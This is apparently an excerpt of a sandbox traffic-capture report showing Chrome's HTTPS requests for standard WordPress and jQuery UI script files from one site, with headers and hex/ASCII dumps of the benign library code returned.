                                                            2025-01-15 10:07:59 UTC5440INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 74 68 69 73 2e 77 70 3d 74 68 69 73 2e 77 70 7c 7c 7b 7d 2c 74 68 69 73 2e 77 70 2e 68 6f 6f 6b 73 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 69 66 28 74 5b 65 5d 29 72 65 74 75 72 6e 20 74 5b 65 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 74 5b 65 5d 3d 7b 69 3a 65 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 6e 5b 65 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 72 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 72 2e 6d 3d 6e 2c 72 2e 63 3d 74 2c 72 2e 64 3d 66 75 6e 63 74 69 6f 6e
                                                            Data Ascii: /*! This file is auto-generated */this.wp=this.wp||{},this.wp.hooks=function(n){var t={};function r(e){if(t[e])return t[e].exports;var o=t[e]={i:e,l:!1,exports:{}};return n[e].call(o.exports,o,o.exports,r),o.l=!0,o.exports}return r.m=n,r.c=t,r.d=function


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            39192.168.2.1649752178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC613OUTGET /wp-includes/js/dist/i18n.min.js?ver=5f1269854226b4dd90450db411a12b79 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:00 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:14:54 GMT
                                                            ETag: "268a-620a93070d6bb"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 9866
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:00 UTC7907INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 74 68 69 73 2e 77 70 3d 74 68 69 73 2e 77 70 7c 7c 7b 7d 2c 74 68 69 73 2e 77 70 2e 69 31 38 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 65 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                            Data Ascii: /*! This file is auto-generated */this.wp=this.wp||{},this.wp.i18n=function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}return n.m=t,n.c=e,n.d=function(
                                                            2025-01-15 10:08:00 UTC1959INData Raw: 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 4d 69 73 73 69 6e 67 4b 65 79 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 4d 69 73 73 69 6e 67 4b 65 79 28 6e 2c 74 29 2c 30 3d 3d 3d 6f 3f 6e 3a 72 29 7d 3b 63 6f 6e 73 74 20 79 3d 7b 22 22 3a 7b 70 6c 75 72 61 6c 5f 66 6f 72 6d 73 3a 74 3d 3e 31 3d 3d 3d 74 3f 30 3a 31 7d 7d 2c 62 3d 2f 5e 69 31 38 6e 5c 2e 28 6e 3f 67 65 74 74 65 78 74 7c 68 61 73 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 29 28 5f 7c 24 29 2f 2c 5f 3d 28 74 2c 65 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 6e 65 77 20 78 28 7b 7d 29 2c 69 3d 6e 65 77 20 53 65 74 2c 6f 3d 28 29 3d 3e 7b 69 2e 66 6f 72 45 61 63 68 28 74 3d 3e 74 28 29 29 7d 2c 61 3d 28 74 2c 65 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 7b 72 2e 64 61 74 61 5b 65 5d 3d 7b 2e 2e 2e 79 2c
                                                            Data Ascii: is.options.onMissingKey&&this.options.onMissingKey(n,t),0===o?n:r)};const y={"":{plural_forms:t=>1===t?0:1}},b=/^i18n\.(n?gettext|has_translation)(_|$)/,_=(t,e,n)=>{const r=new x({}),i=new Set,o=()=>{i.forEach(t=>t())},a=(t,e="default")=>{r.data[e]={...y,


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            40192.168.2.1649753178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC412OUTGET /wp-includes/js/jquery/ui/core.min.js?ver=1.12.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:00 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:30 GMT
                                                            ETag: "5133-620a932910455"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 20787
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:00 UTC7906INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 32 2e 31 20 2d 20 32 30 32 30 2d 30 39 2d 32 35 0a 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 73 63 61 70 65 2d 73 65 6c 65 63 74 6f 72 2e 6a 73 2c 20 66 6f 63 75 73 61 62 6c 65 2e 6a 73 2c 20 66 6f 72 6d 2d 72 65 73 65 74 2d 6d 69 78 69 6e 2e 6a 73 2c 20 66 6f 72 6d 2e 6a 73 2c 20 69 65 2e 6a 73 2c 20 6a 71 75 65 72 79 2d 31 2d 37 2e 6a 73 2c 20 6b 65 79 63 6f 64 65 2e 6a 73 2c 20 6c 61 62 65 6c 73 2e 6a 73 2c 20 70 6c 75 67 69 6e 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 73 61 66 65 2d 61 63 74 69 76 65 2d 65 6c 65 6d 65 6e 74 2e
                                                            Data Ascii: /*! jQuery UI - v1.12.1 - 2020-09-25* http://jqueryui.com* Includes: data.js, disable-selection.js, escape-selector.js, focusable.js, form-reset-mixin.js, form.js, ie.js, jquery-1-7.js, keycode.js, labels.js, plugin.js, position.js, safe-active-element.
                                                            2025-01-15 10:08:00 UTC8000INData Raw: 28 69 5b 30 5d 29 5b 30 5d 2c 6c 2e 65 78 65 63 28 69 5b 31 5d 29 5b 30 5d 5d 7d 29 2c 31 3d 3d 3d 79 2e 6c 65 6e 67 74 68 26 26 28 79 5b 31 5d 3d 79 5b 30 5d 29 2c 22 72 69 67 68 74 22 3d 3d 3d 66 2e 61 74 5b 30 5d 3f 6d 2e 6c 65 66 74 2b 3d 64 3a 22 63 65 6e 74 65 72 22 3d 3d 3d 66 2e 61 74 5b 30 5d 26 26 28 6d 2e 6c 65 66 74 2b 3d 64 2f 32 29 2c 22 62 6f 74 74 6f 6d 22 3d 3d 3d 66 2e 61 74 5b 31 5d 3f 6d 2e 74 6f 70 2b 3d 70 3a 22 63 65 6e 74 65 72 22 3d 3d 3d 66 2e 61 74 5b 31 5d 26 26 28 6d 2e 74 6f 70 2b 3d 70 2f 32 29 2c 75 3d 45 28 5f 2e 61 74 2c 64 2c 70 29 2c 6d 2e 6c 65 66 74 2b 3d 75 5b 30 5d 2c 6d 2e 74 6f 70 2b 3d 75 5b 31 5d 2c 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 2c 74 2c 72 3d 78 28 74 68 69 73 29
                                                            Data Ascii: (i[0])[0],l.exec(i[1])[0]]}),1===y.length&&(y[1]=y[0]),"right"===f.at[0]?m.left+=d:"center"===f.at[0]&&(m.left+=d/2),"bottom"===f.at[1]?m.top+=p:"center"===f.at[1]&&(m.top+=p/2),u=E(_.at,d,p),m.left+=u[0],m.top+=u[1],this.each(function(){var i,t,r=x(this)
                                                            2025-01-15 10:08:00 UTC4881INData Raw: 74 4f 70 74 69 6f 6e 44 69 73 61 62 6c 65 64 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 64 69 73 61 62 6c 65 64 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 28 22 63 72 65 61 74 65 22 2c 6e 75 6c 6c 2c 74 68 69 73 2e 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 28 29 29 2c 74 68 69 73 2e 5f 69 6e 69 74 28 29 7d 2c 5f 67 65 74 43 72 65 61 74 65 4f 70 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 2c 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 3a 78 2e 6e 6f 6f 70 2c 5f 63 72 65 61 74 65 3a 78 2e 6e 6f 6f 70 2c 5f 69 6e 69 74 3a 78 2e 6e 6f 6f 70 2c 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 28 29 2c 78 2e 65 61 63 68
                                                            Data Ascii: tOptionDisabled(this.options.disabled),this._trigger("create",null,this._getCreateEventData()),this._init()},_getCreateOptions:function(){return{}},_getCreateEventData:x.noop,_create:x.noop,_init:x.noop,destroy:function(){var i=this;this._destroy(),x.each


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            41192.168.2.1649755178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC613OUTGET /wp-includes/js/dist/a11y.min.js?ver=0ac8327cc1c40dcfdf29716affd7ac63 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:00 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:14:55 GMT
                                                            ETag: "bc1-620a930849d20"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 3009
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:00 UTC3009INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 74 68 69 73 2e 77 70 3d 74 68 69 73 2e 77 70 7c 7c 7b 7d 2c 74 68 69 73 2e 77 70 2e 61 31 31 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 69 29 7b 69 66 28 65 5b 69 5d 29 72 65 74 75 72 6e 20 65 5b 69 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 65 5b 69 5d 3d 7b 69 3a 69 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 69 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                            Data Ascii: /*! This file is auto-generated */this.wp=this.wp||{},this.wp.a11y=function(t){var e={};function n(i){if(e[i])return e[i].exports;var o=e[i]={i:i,l:!1,exports:{}};return t[i].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            42192.168.2.1649757178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC412OUTGET /wp-includes/js/jquery/ui/menu.min.js?ver=1.12.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:00 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:31 GMT
                                                            ETag: "253b-620a932a95e93"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 9531
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:00 UTC7907INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 4d 65 6e 75 20 31 2e 31 32 2e 31 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 2c 22 2e 2f 63 6f 72 65 22 5d 2c
                                                            Data Ascii: /*! * jQuery UI Menu 1.12.1 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */!function(e){"function"==typeof define&&define.amd?define(["jquery","./core"],
                                                            2025-01-15 10:08:00 UTC1624INData Raw: 70 72 65 76 41 6c 6c 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 6c 65 6e 67 74 68 7d 2c 69 73 4c 61 73 74 49 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 63 74 69 76 65 26 26 21 74 68 69 73 2e 61 63 74 69 76 65 2e 6e 65 78 74 41 6c 6c 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 6c 65 6e 67 74 68 7d 2c 5f 6d 6f 76 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 76 61 72 20 73 3b 28 73 3d 74 68 69 73 2e 61 63 74 69 76 65 3f 22 66 69 72 73 74 22 3d 3d 3d 65 7c 7c 22 6c 61 73 74 22 3d 3d 3d 65 3f 74 68 69 73 2e 61 63 74 69 76 65 5b 22 66 69 72 73 74 22 3d 3d 3d 65 3f 22 70 72 65 76 41 6c 6c 22 3a 22 6e 65 78 74 41 6c 6c 22 5d 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 65 71 28 2d 31
                                                            Data Ascii: prevAll(".ui-menu-item").length},isLastItem:function(){return this.active&&!this.active.nextAll(".ui-menu-item").length},_move:function(e,t,i){var s;(s=this.active?"first"===e||"last"===e?this.active["first"===e?"prevAll":"nextAll"](".ui-menu-item").eq(-1


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            43192.168.2.1649758178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC600OUTGET /wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.12.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:00 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:32 GMT
                                                            ETag: "215b-620a932b25767"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 8539
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:00 UTC7907INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 41 75 74 6f 63 6f 6d 70 6c 65 74 65 20 31 2e 31 32 2e 31 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 2c 22 2e
                                                            Data Ascii: /*! * jQuery UI Autocomplete 1.12.1 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */!function(e){"function"==typeof define&&define.amd?define(["jquery",".
                                                            2025-01-15 10:08:00 UTC632INData Raw: 2c 74 29 7b 76 61 72 20 69 3d 6e 65 77 20 52 65 67 45 78 70 28 6f 2e 75 69 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2e 65 73 63 61 70 65 52 65 67 65 78 28 74 29 2c 22 69 22 29 3b 72 65 74 75 72 6e 20 6f 2e 67 72 65 70 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 2e 74 65 73 74 28 65 2e 6c 61 62 65 6c 7c 7c 65 2e 76 61 6c 75 65 7c 7c 65 29 7d 29 7d 7d 29 2c 6f 2e 77 69 64 67 65 74 28 22 75 69 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 6f 2e 75 69 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2c 7b 6f 70 74 69 6f 6e 73 3a 7b 6d 65 73 73 61 67 65 73 3a 7b 6e 6f 52 65 73 75 6c 74 73 3a 22 4e 6f 20 73 65 61 72 63 68 20 72 65 73 75 6c 74 73 2e 22 2c 72 65 73 75 6c 74 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2b 28 31 3c
                                                            Data Ascii: ,t){var i=new RegExp(o.ui.autocomplete.escapeRegex(t),"i");return o.grep(e,function(e){return i.test(e.label||e.value||e)})}}),o.widget("ui.autocomplete",o.ui.autocomplete,{options:{messages:{noResults:"No search results.",results:function(e){return e+(1<


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            44192.168.2.1649759178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC429OUTGET /wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.7 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:00 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:27 GMT
                                                            ETag: "1906-620a93268102c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 6406
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:00 UTC6406INData Raw: 76 61 72 20 72 75 6e 74 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 75 2c 74 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 68 3d 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 72 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3f 53 79 6d 62 6f 6c 3a 7b 7d 2c 6e 3d 72 2e 69 74 65 72 61 74 6f 72 7c 7c 22 40 40 69 74 65 72 61 74 6f 72 22 2c 65 3d 72 2e 61 73 79 6e 63 49 74 65 72 61 74 6f 72 7c 7c 22 40 40 61 73 79 6e 63 49 74 65 72 61 74 6f 72 22 2c 6f 3d 72 2e 74 6f 53 74 72 69 6e 67 54 61 67 7c 7c 22 40 40 74 6f 53 74 72 69 6e 67 54 61 67 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 72 2c 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50
                                                            Data Ascii: var runtime=function(a){"use strict";var u,t=Object.prototype,h=t.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},n=r.iterator||"@@iterator",e=r.asyncIterator||"@@asyncIterator",o=r.toStringTag||"@@toStringTag";function i(t,r,e){return Object.defineP


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            45192.168.2.1649760178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:00 UTC438OUTGET /wp-includes/js/dist/dom-ready.min.js?ver=71883072590656bf22c74c7b887df3dd HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:00 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:00 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:14:58 GMT
                                                            ETag: "4e9-620a930ad81a8"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1257
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:00 UTC1257INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 74 68 69 73 2e 77 70 3d 74 68 69 73 2e 77 70 7c 7c 7b 7d 2c 74 68 69 73 2e 77 70 2e 64 6f 6d 52 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 74 5b 72 5d 29 72 65 74 75 72 6e 20 74 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 74 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 72 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6e 2e 6d 3d 65 2c 6e 2e 63 3d 74 2c 6e 2e 64 3d 66 75 6e 63 74
                                                            Data Ascii: /*! This file is auto-generated */this.wp=this.wp||{},this.wp.domReady=function(e){var t={};function n(r){if(t[r])return t[r].exports;var o=t[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=e,n.c=t,n.d=funct


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
